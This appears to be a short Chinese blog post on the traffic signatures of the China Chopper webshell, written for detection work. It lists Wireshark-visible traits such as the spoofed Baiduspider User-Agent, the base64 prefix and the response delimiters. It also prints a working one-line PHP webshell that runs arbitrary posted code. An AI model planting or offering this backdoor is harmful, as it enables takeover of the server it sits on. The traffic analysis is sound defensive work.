【流量特征+webshell】菜刀篇 · 一句话木马

o-O-oO / 2024-08-23 / 原文

连接webshell

准备一句话

<?php eval($_POST[caidao]);?>

打开菜刀连接webshell

使用wireshark查询流量

特征分析
特征一：POST方法，一句话路径

首先，过滤http流量，可以看到有访问webshell后门的路径

特征二：UA头均为百度爬虫标识

User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\r\n

特征三：Key为连接密码，base64前缀相同

base64的前缀均为

QGluaV9zZXQoImRpc3BsYX...

特征四：返回结果在响应包中使用X@Y作为定界符包裹，命令存在[S] [E] 作为定界符

原创 Eonian Sharp

【流量特征+webshell】菜刀篇 · 一句话木马更多相关文章

今日报告-66

设置Windows10暂停更新3000天

AQS公平锁的流程

AMD锐龙7 7800X3D网游专项测试：竟比i9-13900KS强了15%

常用总线技术基本参数对比

探索图像数据中的隐藏信息：语义实体识别和关系抽取的奇妙之旅

设置Chrome浏览器自动升级

JavaScript – 小技巧 Tips

postgresql在插入数据后怎么获取自增id

EF Core 的基本使用

error: failed to push some refs to 'https://github.com/*******/********.github.io.git'

欧拉降幂

编程语言能力对比

基于机器视觉的小车轨迹控制软件界面展示

随机推荐

step7 V5.x上的SCL

yolo --- 核心思想

【游记】CCPC 济南 2024 游记

AJAX & AXIOS-2024/11/1

验证码处理在自动化测试中的应用

一些学科笑话

NOIP2024模拟赛20 & 11.1 小记

20241101 数据结构与算法期中机试收获

Java，启动！

什么是IT技术

即将到来！

2024/11/1日日志关于JavaScript简介&引入方式以及基础语法的学习

舍得-时间-工作是人的一生最重要的事情-自己要有私房钱-人的一生最重要的事情是书写自己的人生

2.TiUP 部署 DM 集群

原型模式的C++实现

python bytecode解析

09-XSS键盘监听、cookie窃取&文件上传绕过

ubuntu 24.04 部署 mysql 8.4.3 LTS

国标GB28181公网平台LiteGBS国标GB28181视频平台建筑工地无线视频联网监控系统方案

imes完工下线

【流量特征+webshell】 菜刀篇 · 一句话木马

连接webshell

使用wireshark查询流量

【流量特征+webshell】 菜刀篇 · 一句话木马更多相关文章

随机推荐

热门话题

【流量特征+webshell】菜刀篇 · 一句话木马

【流量特征+webshell】菜刀篇 · 一句话木马更多相关文章